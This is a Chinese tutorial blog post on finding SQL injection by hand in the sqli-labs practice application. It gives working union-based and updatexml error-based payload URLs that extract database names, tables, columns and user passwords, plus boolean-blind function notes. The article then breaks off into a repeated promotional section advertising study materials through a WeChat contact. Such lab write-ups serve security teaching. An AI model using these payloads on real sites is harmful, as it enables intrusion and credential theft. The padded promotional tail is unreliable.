SQL注入漏洞手工挖掘大全（保姆级干货教学）(1)

判断注入点：

1、数字型

输入？id=1 正常；

输入？id=1’ 报错；

如果是以上情况的话我们就判断可能存在sql数字型注入漏洞。（因为我们输入的错误字符单引号，系统没有过滤并且将它执行了。）

2、字符型

?id=1 and 1=1–+ 正常

?id=1 and 1=2–+ 正常

再通过干扰字符来判断 ?id=1’ and 1=2–+ 不正常

如果是以上结果的话判断就为sql字符型注入漏洞。

判断字段数：

输入order by 2 会查询出数据结果。但是输入order by 3 会报错。这说明该表中存在两个字段。

http://192.168.10.150/sqlilabs/Less-1/?id=1’ order by 4–+

判断回显点：

输入1 union select 1,2 会返回

字符型：

输入-1’ union select 1,2,3…n(n为字段数) 如下图所示：回显位是2和3

获取数据库名称和版本号：

数据库名为security 版本大于5所以存在information_schema表

http://www.sql.com/Less-1/?id=-1%27%20union%20select%201,database(),version()–+

确认数据库里的表名

查到表名为emails,referers,uagents,users

http://192.168.10.150/sqlilabs/Less-1/?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security”–+

确认user表里的字段名(列名)

http://192.168.10.150/sqlilabs/Less-1/?id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“users”–+

获取数据

我们获取到了数据

http://192.168.10.150/sqlilabs/Less-1/?id=-1’ union select 1,group_concat(username),group_concat(password) from users–+

报错盲注

（1）报错盲注基本概念

1）报错盲注的定义

报错注入就是利用了数据库的某些机制，人为的制造错误的条件，使得查询的结果能够出现在错误的信息中。

2）报错盲注的前提

页面没有回显点，但是必须SQL语句能够执行错误的信息。

优点：不需要显示位。

缺点：需要有SQL语句的报错信息。

（2）报错盲注步骤

构造目标数据查询语句》选择报错注入函数》构造报错注入语句》拼接报错注入语句。

（3）常用报错函数

Floor、updatexml、extractvalue…等等。

（4）常用报错函数使用语法

1）Updatexml()函数报错注入

Updatexml()则负责修改查询到的内容

语法：updatexml (XML_document, XPath_string, new_value);

第一个参数：XML_document是String格式，为XML文档对象的名称，XML的内容。

第二个参数：XPath_string (Xpath格式的字符串) ，是需要update的位置XPATH路径。

第三个参数：new_value，String格式，更新后的内容

2）extractvalue()函数报错注入

extractvalue()函数作用：MYSQL对XML文档数据进行查询的XPATH函数。

语法： extractvalue(xml_document, xpath_string)

第一个参数：xml_document是string格式，为xml文档对象的名称

第二个参数：xpath_string (xpath格式的字符串)

extractvalue使用时当xpath_string格式出现错误，mysql则会爆出xpath语法错误

判断注入点

?id=1 and 1=1–+ 正常

?id=1 and 1=2–+ 正常

再通过干扰字符来判断 ?id=1’ and 1=2–+ 不正常

如果是以上结果的话判断就为sql字符型注入漏洞。

判断是否存在报错注入

（由于页面没有回显的地方，所以我们就直接判断是否是报错注入）

运用updatexml函数构建基本的语句对页面进行测试是否存在报错注入。

http://192.168.10.150/sqlilabs/Less-5/?id=1’ and updatexml(1,‘~’,3)–+

确定数据库名

看到返回~符号后，说明存在报错注入漏洞。我们再获取数据库名。

http://192.168.10.150/sqlilabs/Less-5/?id=1’ and updatexml(1,concat(0x7e,database()),3)–+

确定数据库的表名

把concat中database()换成正常的查询sql语句就可以了，和联合查询语句如出一辙。

http://192.168.10.150/sqlilabs/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ )),3)–+

确定数据库列名

查看user表数据库的列名

http://192.168.10.150/sqlilabs/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ )),3)–+

确定数据库信息

可以通过limit来进行翻页查看

http://192.168.10.150/sqlilabs/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select group_concat(username) from users )),3)–+ http://192.168.10.150/sqlilabs/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select group_concat(password) from users )),3)–+

布尔盲注

布尔盲注一般适用于页面没有回显位置，也就是不支持联合查询，同时web页面返回true或者false构造SQL语句，从而达到注入获取数据的目的。

布尔盲注步骤

求数据库名的长度及ASCII》求当前数据库表的ASCII》求当前数据库表中的个数》求数据库中表名的长度》求数据库中表名》求列名的数量》求列名的长度》求列名的ASCII》求字段的数量》求字段的长度》求字段内容ASCII

（3）常用布尔函数使用语法

1）substr()截取函数

语法：substr(str，start，length)

第一个参数str为被截取的字符串。

第二个参数start为开始截取的位置。

第三个参数length为截取的长度。

如：substr(user()，1，1)，从user中返回的数据的第一位开始偏移位置截取一位，后续需要获取其他的数据只需要修改参数即可。

2）left()截取函数

语法：left(str，length)

第一个参数str为被截取的字符串。

第二个参数length为截取的长度。

如：left(user()，2)，从user中返回的数据中截取前两位。

3）right()截取函数

语法：rigth(user()，2)

参考left()函数用法。

4）ascii()转换函数

语法：ascii(char)

第一个参数char为一个字符。

如：ascii(user())若char为一串字符串，则返回的结果将是第一个字母的ASCII码，通常在使用中结合substr函数结合使用。Ascii(substr(user()1,1)),这样就可以获取user()中第一位字符的ASCII码。

5）length()计算函数

语法：length(str)

第一个参数str为字符串。

如：length(admin)返回就是5。如果不是放某个字符串，放置表达式的时候，需要使用括号括起来。

6）ord()转换函数

语法：ord(str)

参考ascii()函数用法。

如果存在没写到的函数，但是使用了，可以自行搜索。

判断注入点

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-sspsyCMq-1712550227219)]